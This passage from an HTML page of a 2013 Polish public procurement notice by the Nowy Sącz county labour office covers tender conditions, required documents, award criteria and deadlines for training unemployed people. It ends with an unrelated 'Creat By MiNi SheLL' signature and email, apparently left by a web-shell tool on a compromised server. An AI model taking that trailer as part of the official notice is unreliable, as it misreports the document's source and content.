UWAGA: Zamawiający zastrzega sobie prawo do przeprowadzenia wizji lokalnej pomieszczeń, w których realizowany będzie przedmiot zamówienia w celu potwierdzenia zgodności z zapisami specyfikacji i w związku z tym wymaga podania miejsca (dokładny adres) realizacji zajęć szkoleniowych na 5 dni przed podpisaniem umowy.
	
Koszty wynajęcia użytkowania i wyposażenia sal wykładowych należy uwzględnić przy obliczaniu kosztu szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 38.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).Zamawiający żąda zgodnie z Art. 20 ust. 1 ustawy z dnia 20 kwietnia 
2004 r. o promocji zatrudnienia i instytucjach rynku pracy - Tekst jednolity: Dz. U. 2008 r. Nr 69 
poz. 415 wpisu Wykonawcy do rejestru instytucji szkoleniowych. 

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia 
na podstawie informacji zawartych w dostarczonym oświadczeniu (Załącznik nr 3 do SIWZ) oraz poprzez sprawdzenia w systemie elektronicznym Syriusz www.ris.praca.gov.pl prowadzonym przez Wojewódzkie Urzędy Pracy czy Wykonawca posiada aktualny na dany rok kalendarzowy wpis do rejestru instytucji szkoleniowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).Warunek ten zostanie spełniony jeśli Wykonawca wykaże minimum 
1 szkolenie przeprowadzone dla co najmniej 10 osobowej grupy zgodnej z przedmiotem zamówienia. 
Załączony wykaz wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert szkoleń grupowych dla osób bezrobotnych zgodnych z przedmiotem zamówienia powinien zawierać m.in.: nazwę szkolenia; liczbę przeszkolonych osób bezrobotnych; wartość szkolenia; termin realizacji szkolenia; nazwę i adres zleceniodawcy. Do każdego z zamieszczonych w wykazie szkoleń należy dołączyć kserokopię dokumentów (np. referencji) potwierdzających, że w/w szkolenia zostały wykonane z należytą starannością.

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia 
na podstawie informacji zawartych w dostarczonym oświadczeniu i dokumentach wymaganych 
w specyfikacji (Załącznik nr 3 i 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji). Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Certyfikat jakości usług ISO - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - w przypadku posiadania stosownego dokumentu,
2) Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - 
w przypadku posiadania stosownego dokumentu,</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że nie należy do grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń dla osób bezrobotnych zgodnych z przedmiotem zamówienia - 20</li>
<li>3 - Certyfikat jakości usług ISO - 10</li>
<li>4 - Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa  może  ulec   zmianie  w   przypadku  zmniejszenia   liczby  uczestników   szkolenia z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
a) niepodjęcia szkolenia pomimo wcześniejszych deklaracji  o uczestnictwie,
b) przerwania uczestnictwa w szkoleniu (podjęcie pracy przez bezrobotnego, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy.
2. Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy:
a) zmiany kadry realizującej szkolenie w wyniku nieprzewidywalnych  zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy.
3. Zamawiający wyliczy do umowy koszt szkolenia jednej osoby brutto jako iloraz całkowitej ceny brutto za szkolenie przez ilość uczestników szkolenia podanych w specyfikacji istotnych warunków zamówienia.
51. W sytuacji, gdy liczba osób szkolonych ulegnie zmniejszeniu stosownie do postanowień pkt. 1 b) wynagrodzenie za szkolenie tych osób stanowi sumę kosztów zrealizowanych osobogodzin przez każdą z tych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.powiat-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego, 33-300  Nowy Sącz, ul. Nawojowska 118.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Nowym Sączu przy ul. Nawojowskiej 118, na dzienniku podawczym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu  pn.: Twoja decyzja - nasza pomoc współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki,  Priorytet VII  Działanie 7.2  Poddziałanie 7.2.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com